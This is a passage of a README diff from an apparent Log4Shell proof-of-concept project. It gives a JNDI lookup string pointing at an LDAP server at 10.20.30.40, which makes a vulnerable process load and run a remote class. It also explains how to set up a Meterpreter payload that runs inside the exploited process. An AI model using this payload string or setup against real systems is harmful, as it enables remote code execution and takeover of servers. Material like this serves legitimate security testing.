s-retlaw/l4s_poc/README.md

 To trigger the above command use the name of the class you created i.e :
 '${jndi:ldap://10.20.30.40:1389/#TestCmd'

+The Payload.java file is the full Meterpreter file that is setup to run as a thread in the calling process that had the log4shell issue.
+This needs to be manuallyy compiled and moved to the wwwroot dir.
+Additionally you need to have the metasploit.dat file setup with the properties you need.

 ## Clients
 The clients directory has 2 clients that can be executed.
 One is a simple command line program that will write an error log for whatever the 1st param passed in is.